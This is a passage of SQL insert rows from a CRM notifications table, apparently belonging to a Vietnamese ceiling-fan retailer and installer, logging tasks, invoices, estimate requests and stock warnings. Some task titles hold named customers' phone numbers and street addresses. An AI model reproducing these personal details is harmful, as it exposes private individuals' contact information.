(193, 1, 1, '2022-03-16 10:26:29', 'not_task_added_himself_as_follower', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, '#taskid=10', 'a:1:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
(197, 1, 1, '2022-03-16 10:26:32', 'not_task_added_someone_as_follower', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, '#taskid=10', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
(200, 1, 1, '2022-03-16 10:27:44', 'not_task_marked_as_complete', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, '#taskid=10', 'a:1:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
(204, 1, 1, '2022-03-16 10:28:19', 'not_task_unmarked_as_complete', 3, 0, 'Tổ chức đào tạo WIT Sale', 1, NULL, '#taskid=10', 'a:1:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
(322, 1, 1, '2022-03-26 13:08:55', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=7', 'a:1:{i:0;s:35:\"Liên hệ HẸN ngày lắp đặt\";}'),
(324, 1, 1, '2022-03-26 13:09:01', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=8', 'a:1:{i:0;s:73:\"Liên hệ lắp đặt - chốt được ngày chính xác với anh Duy\";}'),
(328, 1, 1, '2022-03-26 13:09:12', 'not_task_status_changed', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=10', 'a:2:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";i:1;s:24:\"Đang chờ phản hồi\";}'),
(332, 1, 1, '2022-03-26 14:07:00', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=10', 'a:1:{i:0;s:44:\"Bảo hành quạt phát tiếng động cơ\";}'),
(377, 1, 1, '2022-03-28 16:13:46', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=14', 'a:1:{i:0;s:74:\"Chuẩn bị Giấy đề nghị thanh toán đợt 1 gởi công ty C.H.A\";}'),
(386, 1, 1, '2022-04-01 09:04:10', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/73', 'a:1:{i:0;s:9:\"INV-67-22\";}'),
(448, 1, 1, '2022-04-14 09:08:15', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/81', 'a:1:{i:0;s:9:\"INV-78-22\";}'),
(457, 1, 1, '2022-04-18 09:01:24', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/82', 'a:1:{i:0;s:9:\"INV-79-22\";}'),
(462, 1, 1, '2022-04-19 16:46:35', 'not_task_assigned_to_you', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=20', 'a:1:{i:0;s:58:\"Hẹn ngày giao hàng + lắp đặt quạt Sino A. Hậu\";}'),
(466, 1, 1, '2022-04-19 16:46:35', 'not_task_assigned_someone', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=20', 'a:2:{i:0;s:17:\"Tổ chức đào tạo WIT Sale\";i:1;s:58:\"Hẹn ngày giao hàng + lắp đặt quạt Sino A. Hậu\";}'),
(467, 1, 1, '2022-04-22 16:35:19', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/86', 'a:1:{i:0;s:9:\"INV-83-22\";}'),
(469, 1, 1, '2022-04-22 16:40:43', 'not_task_assigned_to_you', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=21', 'a:1:{i:0;s:52:\"Hẹn ngày giao hàng + lắp đặt quạt TOBAGO \";}'),
(473, 1, 1, '2022-04-22 16:40:43', 'not_task_assigned_someone', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=21', 'a:2:{i:0;s:17:\"Tổ chức đào tạo WIT Sale\";i:1;s:52:\"Hẹn ngày giao hàng + lắp đặt quạt TOBAGO \";}'),
(475, 1, 1, '2022-04-22 16:42:09', 'not_task_assigned_to_you', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=22', 'a:1:{i:0;s:52:\"Hẹn ngày giao hàng + lắp đặt quạt TOBAGO \";}'),
(478, 1, 1, '2022-04-22 16:42:52', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=21', 'a:1:{i:0;s:52:\"Hẹn ngày giao hàng + lắp đặt quạt TOBAGO \";}'),
(481, 1, 1, '2022-04-22 16:53:51', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=20', 'a:1:{i:0;s:58:\"Hẹn ngày giao hàng + lắp đặt quạt Sino A. Hậu\";}'),
(484, 1, 1, '2022-04-24 14:27:22', 'estimate_request_assigned_to_staff', 1, 0, 'Ho Gia Phat', 1, NULL, 'estimate_request/view/14', 'a:0:{}'),
(486, 1, 1, '2022-04-26 08:52:47', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=22', 'a:1:{i:0;s:52:\"Hẹn ngày giao hàng + lắp đặt quạt TOBAGO \";}'),
(496, 1, 1, '2022-04-27 09:33:25', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/5', 'a:1:{i:0;s:1:\"1\";}'),
(497, 1, 1, '2022-04-27 09:33:33', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/5', 'a:1:{i:0;s:1:\"1\";}'),
(498, 1, 1, '2022-04-27 09:35:23', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/6', 'a:1:{i:0;s:1:\"1\";}'),
(499, 1, 1, '2022-04-27 09:35:26', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/6', 'a:1:{i:0;s:1:\"1\";}'),
(503, 1, 1, '2022-04-27 11:22:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/7', 'a:1:{i:0;s:1:\"1\";}'),
(504, 1, 1, '2022-04-27 11:23:02', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/7', 'a:1:{i:0;s:1:\"1\";}'),
(507, 1, 1, '2022-04-27 13:53:30', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=17', 'a:1:{i:0;s:64:\"Giao hàng + lắp đặt quạt Essence thứ 6 Ngày 15.4.2022\";}'),
(509, 1, 1, '2022-04-27 15:20:51', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/8', 'a:1:{i:0;s:1:\"1\";}'),
(510, 1, 1, '2022-04-27 15:20:55', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/8', 'a:1:{i:0;s:1:\"1\";}'),
(520, 1, 1, '2022-05-03 08:52:10', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=25', 'a:1:{i:0;s:43:\"Giao hàng mẫu cho khách - Mr.Khang SOL \";}'),
(523, 1, 1, '2022-05-03 08:54:09', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=18', 'a:1:{i:0;s:63:\"Giao hàng + lắp đặt động cơ quạt Powerfoil X30 Plus\";}'),
(526, 1, 1, '2022-05-05 09:31:21', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/16', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(532, 1, 1, '2022-05-06 08:24:56', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/17', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(550, 1, 1, '2022-05-06 16:15:15', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=28', 'a:1:{i:0;s:36:\"Giao hàng lắp đặt quạt Aroma\";}'),
(563, 1, 1, '2022-05-10 08:43:55', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=29', 'a:1:{i:0;s:138:\"Giao hàng Bến Xe Miền Đông gởi đi Ban Mê Thuột - Gởi chành xe đi Ban Mê Thuộc - Trần Trung Nguyên - SĐT 0948171199\";}'),
(569, 1, 1, '2022-05-11 08:38:26', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=31', 'a:1:{i:0;s:38:\"Giao hàng + lắp đặt quạt Aroma\";}'),
(572, 1, 1, '2022-05-11 08:39:11', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=30', 'a:1:{i:0;s:90:\"Giao hàng ra ga gởi đi Hà Nội - Người nhận - Đèn Kim Thanh - Phùng Hưng HN\";}'),
(575, 1, 1, '2022-05-11 08:40:51', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=31', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:50:\"Giao hàng + lắp đặt quạt Aroma A Chánh Q7\";}'),
(610, 1, 1, '2022-05-16 08:23:21', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=24', 'a:1:{i:0;s:101:\"Giao hàng + yêu cầu thanh toán qua ngân hàng còn lại trước khi giao hàng tại quận 2\";}'),
(611, 1, 1, '2022-05-17 12:52:25', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/84', 'a:1:{i:0;s:9:\"INV-81-22\";}'),
(613, 1, 1, '2022-05-17 12:52:57', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=31', 'a:1:{i:0;s:50:\"Giao hàng + lắp đặt quạt Aroma A Chánh Q7\";}'),
(616, 1, 1, '2022-05-17 12:52:57', 'not_task_unmarked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=31', 'a:1:{i:0;s:50:\"Giao hàng + lắp đặt quạt Aroma A Chánh Q7\";}'),
(619, 1, 1, '2022-05-17 12:53:06', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=27', 'a:1:{i:0;s:128:\"Chuẩn bị - Lắp đặt quạt trần cho khách. Ngày dự kiến chưa có. Liên hệ hỏi thăm trước khi đi lắp\";}'),
(623, 1, 1, '2022-05-19 15:02:26', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/18', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(645, 1, 1, '2022-05-27 16:14:34', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/102', 'a:1:{i:0;s:9:\"INV-95-22\";}'),
(647, 1, 1, '2022-05-31 20:08:48', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/19', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(671, 1, 1, '2022-06-06 09:16:14', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/107', 'a:1:{i:0;s:10:\"INV-100-22\";}'),
(673, 1, 1, '2022-06-06 15:01:17', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=37', 'a:1:{i:0;s:26:\"Lắp đặt quạt AROMA \";}'),
(677, 1, 1, '2022-06-06 15:01:17', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=37', 'a:2:{i:0;s:17:\"Tổ chức đào tạo WIT Sale\";i:1;s:26:\"Lắp đặt quạt AROMA \";}'),
(680, 1, 1, '2022-06-06 15:01:17', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=37', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:26:\"Lắp đặt quạt AROMA \";}'),
(683, 1, 1, '2022-06-06 16:48:40', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=36', 'a:1:{i:0;s:61:\"Bảo hành quạt 7063A - 3 bộ lắp đặt ngày 6.7.2020\";}'),
(686, 1, 1, '2022-06-06 16:49:12', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=26', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(688, 1, 1, '2022-06-06 16:49:23', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=28', 'a:1:{i:0;s:36:\"Giao hàng lắp đặt quạt Aroma\";}'),
(690, 1, 1, '2022-06-07 11:03:38', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/20', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(703, 1, 1, '2022-06-11 08:19:32', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=35', 'a:1:{i:0;s:76:\"Giao hàng Haiku Caramel Bamboo 60 inch - đèn LED cho anh Hậu. Hà Nội\";}'),
(706, 1, 1, '2022-06-14 10:56:49', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/9', 'a:1:{i:0;s:1:\"1\";}'),
(707, 1, 1, '2022-06-14 10:56:53', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/9', 'a:1:{i:0;s:1:\"1\";}'),
(708, 1, 1, '2022-06-14 10:59:07', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/113', 'a:1:{i:0;s:1:\"2\";}'),
(709, 1, 1, '2022-06-14 10:59:13', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/113', 'a:1:{i:0;s:1:\"2\";}'),
(710, 1, 1, '2022-06-16 11:47:52', 'not_customer_viewed_invoice', 0, 0, '', 1, 1, 'invoices/list_invoices/89', 'a:1:{i:0;s:10:\"INV-104-22\";}'),
(712, 1, 1, '2022-06-16 11:48:48', 'not_customer_viewed_invoice', 0, 0, '', 1, 1, 'invoices/list_invoices/106', 'a:1:{i:0;s:9:\"INV-99-22\";}'),
(713, 1, 1, '2022-06-16 13:56:50', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/89', 'a:1:{i:0;s:10:\"INV-104-22\";}'),
(734, 1, 1, '2022-06-21 10:13:45', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/21', 'a:1:{i:0;s:39:\"Yêu cầu bảo hành - Bảo Dưỡng\";}'),
(754, 1, 1, '2022-06-23 11:42:37', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=32', 'a:1:{i:0;s:110:\"Tháo quạt Nevis 93YFT-7046S màu Sliver Alu đóng thùng cẩn thận - gởi ra Hà Nội ngày 10.6.2022\";}'),
(758, 1, 1, '2022-06-23 11:42:53', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=38', 'a:1:{i:0;s:51:\"Giao hàng lắp đặt Pearl 60 - BN - Dark Walnut\";}'),
(760, 1, 1, '2022-06-23 11:43:19', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=37', 'a:1:{i:0;s:26:\"Lắp đặt quạt AROMA \";}'),
(789, 1, 1, '2022-06-25 10:55:33', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/10', 'a:1:{i:0;s:1:\"1\";}'),
(790, 1, 1, '2022-06-25 10:55:36', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/10', 'a:1:{i:0;s:1:\"1\";}'),
(791, 1, 1, '2022-06-25 11:03:20', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/11', 'a:1:{i:0;s:1:\"1\";}'),
(792, 1, 1, '2022-06-25 11:03:22', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/11', 'a:1:{i:0;s:1:\"1\";}'),
(797, 1, 1, '2022-06-25 15:46:22', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/115', 'a:1:{i:0;s:10:\"INV-112-22\";}'),
(799, 1, 1, '2022-06-27 14:50:27', 'not_customer_viewed_invoice', 0, 0, '', 1, 1, 'invoices/list_invoices/101', 'a:1:{i:0;s:9:\"INV-DRAFT\";}'),
(801, 1, 1, '2022-06-27 15:27:06', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=40', 'a:1:{i:0;s:132:\"INV-112-22. Liên hệ lắp đặt quạt Aroma. Đc: 52 nguyễn văn nguyễn - tân định - Q1. Liên hệ 034 3358080 - Hưng\";}'),
(804, 1, 1, '2022-06-27 15:28:19', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=42', 'a:1:{i:0;s:42:\"Lắp đặt 2 quạt Pearl Thảo Điền\";}'),
(808, 1, 1, '2022-06-27 15:28:19', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=42', 'a:2:{i:0;s:17:\"Tổ chức đào tạo WIT Sale\";i:1;s:42:\"Lắp đặt 2 quạt Pearl Thảo Điền\";}'),
(816, 1, 1, '2022-06-30 18:35:05', 'not_customer_viewed_invoice', 0, 0, '', 1, 1, 'invoices/list_invoices/84', 'a:1:{i:0;s:9:\"INV-81-22\";}'),
(817, 1, 1, '2022-06-30 18:45:07', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/12', 'a:1:{i:0;s:1:\"1\";}'),
(818, 1, 1, '2022-06-30 18:45:10', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/12', 'a:1:{i:0;s:1:\"1\";}'),
(819, 1, 1, '2022-06-30 18:49:58', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/13', 'a:1:{i:0;s:1:\"1\";}'),
(820, 1, 1, '2022-06-30 18:50:02', 'notify_send_approve_stock_import', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_purchase/13', 'a:1:{i:0;s:1:\"1\";}'),
(821, 1, 1, '2022-06-30 19:01:25', 'not_new_reminder_for', 0, 0, '', 1, 1, 'estimates/list_estimates/55', 'a:1:{i:0;s:62:\"QUOTE-55-22 - Hỏi lại báo giá - tiến độ dự án...\";}'),
(825, 1, 1, '2022-06-30 19:07:54', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>', 1, 0, 'Ho Gia Phat', 1, NULL, NULL, 'a:1:{i:0;s:633:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>\";}'),
(828, 1, 1, '2022-06-30 19:12:23', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>', 1, 0, 'Ho Gia Phat', 1, NULL, NULL, 'a:1:{i:0;s:633:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>\";}'),
(829, 1, 1, '2022-06-30 19:46:32', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/91', 'a:1:{i:0;s:1:\"2\";}'),
(830, 1, 1, '2022-06-30 19:46:35', 'notify_send_approve_stock_export', 1, 0, 'Ho Gia Phat', 1, NULL, 'warehouse/edit_delivery/91', 'a:1:{i:0;s:1:\"2\";}'),
(832, 1, 1, '2022-07-01 13:37:47', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=44', 'a:1:{i:0;s:52:\"Thi công lắp đặt Powerful S1 - AIS Mai Chi Tho\";}'),
(834, 1, 1, '2022-07-01 16:40:05', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/22', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(842, 1, 1, '2022-07-02 09:36:11', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=48', 'a:1:{i:0;s:49:\"Lắp đặt quạt Pearl - gỗ sáng Sao Việt\";}'),
(846, 1, 1, '2022-07-02 09:37:34', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=42', 'a:1:{i:0;s:42:\"Lắp đặt 2 quạt Pearl Thảo Điền\";}'),
(849, 1, 1, '2022-07-06 10:25:15', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=49', 'a:1:{i:0;s:45:\"Khảo sát trần nhà chị Mị - Quận 7\";}'),
(851, 1, 1, '2022-07-07 08:31:21', 'not_invoice_payment_recorded', 0, 0, '', 1, 1, 'invoices/list_invoices/123', 'a:1:{i:0;s:10:\"INV-119-22\";}'),
(853, 1, 1, '2022-07-09 11:01:03', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/23', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(859, 1, 1, '2022-07-11 11:47:20', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/24', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(865, 1, 1, '2022-07-13 14:44:47', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=49', 'a:1:{i:0;s:45:\"Khảo sát trần nhà chị Mị - Quận 7\";}'),
(867, 1, 1, '2022-07-13 14:44:57', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=43', 'a:1:{i:0;s:83:\"Lắp đặt quạt Aroma 52 - 77 Võ Văn Kiệt (Liên hệ - 0932090546 MrTrung)\";}'),
(870, 1, 1, '2022-07-14 13:29:06', 'new_estimate_request_submitted_from_form', 0, 0, '', 1, 1, 'estimate_request/view/25', 'a:1:{i:0;s:33:\"Tư Vấn | Hỗ Trợ Bán Hàng\";}'),
(876, 1, 1, '2022-07-14 14:54:01', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=50', 'a:1:{i:0;s:33:\"Lắp đặt quạt ONIX - A Long\";}'),
(880, 1, 1, '2022-07-14 14:54:01', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=50', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:33:\"Lắp đặt quạt ONIX - A Long\";}'),
(882, 1, 1, '2022-07-16 08:24:54', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=50', 'a:1:{i:0;s:33:\"Lắp đặt quạt ONIX - A Long\";}'),
(885, 1, 1, '2022-07-19 08:35:30', 'Cảnh báo hàng tồn kho  : <a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>', 1, 0, 'Ho Gia Phat', 1, NULL, NULL, 'a:1:{i:0;s:633:\"<a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1853\">Sku Code: HAN-01853 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1931\">Sku Code: PN93YFT7046 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/><a href=\"https://hgphome.com/admin/warehouse/view_commodity_detail/1939\">Sku Code: PN01939 - Mã kho hàng: KHOQUAN2 - Số lượng hàng tồn kho tối thiểu: 0 - Số lượng hàng tồn kho: 0</a><br/>\";}'),
(888, 1, 1, '2022-07-19 09:22:13', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=52', 'a:1:{i:0;s:53:\"Bảo hành sửa chữa Quạt Aroma - Quốc Thiên\";}'),
(892, 1, 1, '2022-07-19 09:22:13', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=52', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:53:\"Bảo hành sửa chữa Quạt Aroma - Quốc Thiên\";}'),
(901, 1, 1, '2022-07-19 14:05:19', 'not_task_marked_as_complete', 9, 0, 'Ky Thuat HGP', 1, NULL, '#taskid=52', 'a:1:{i:0;s:53:\"Bảo hành sửa chữa Quạt Aroma - Quốc Thiên\";}'),
(904, 1, 1, '2022-07-20 09:18:55', 'not_task_added_you_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=54', 'a:1:{i:0;s:31:\"Lắp đặt quạt SAONA WHITE\";}'),
(908, 1, 1, '2022-07-20 09:18:56', 'not_task_added_someone_as_follower', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=54', 'a:2:{i:0;s:7:\"Cong Ho\";i:1;s:31:\"Lắp đặt quạt SAONA WHITE\";}'),
(910, 1, 1, '2022-07-20 09:19:51', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=48', 'a:1:{i:0;s:49:\"Lắp đặt quạt Pearl - gỗ sáng Sao Việt\";}'),
(912, 1, 1, '2022-07-20 09:20:10', 'not_task_marked_as_complete', 6, 0, 'Mỹ Anh Nguyễn', 1, NULL, '#taskid=41', 'a:1:{i:0;s:93:\"Tuần sau KH Liên hệ lắp đặt - tại chung cư 77 Võ Văn Kiệt - Bình Tân - HCM\";}'),
